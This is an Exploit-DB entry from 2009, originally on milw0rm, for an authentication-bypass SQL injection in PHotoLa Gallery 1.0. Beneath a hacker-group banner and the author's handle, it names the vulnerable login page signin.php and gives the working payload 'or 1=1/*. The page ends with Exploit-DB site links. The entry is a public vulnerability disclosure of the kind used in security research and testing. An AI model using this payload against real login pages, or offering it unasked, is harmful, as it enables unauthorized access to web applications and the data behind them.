PHotoLa Gallery 1.0 - Authentication Bypass

EDB-ID:

9385

CVE:

N/A

EDB Verified:

Author:

Red-D3v1L

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2009-08-07

Vulnerable App:

==============================================================================
                      _      _       _          _      _   _
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                        

==============================================================================
        [Â»] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
        [Â»]  PHotoLa Gallery <= 1.0 (Auth Bypass) SQL injection Valunrability
==============================================================================
    [Â»] my home:            [ Hackteach.org ]
    [Â»] Script:             [ PHotoLa Gallery ]
    [Â»] Language:           [ PHP ]
    [Â»] home:               [ http://www.photola.co.uk ]
    [Â»] Founder:            [ Red-D3v1L < php-c0de@hotmail.com > ]
    [Â»] Gr44tz to:          [ All member Hackteach.org/cc ]

###########################################################################



===[ Exploit SQL  ]===  
  
    [Â»] [PaTH]/signin.php


    [Â»] Exploit : 'or 1=1/*

 

Author: Red-D3v1L <-

###########################################################################

# milw0rm.com [2009-08-07]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services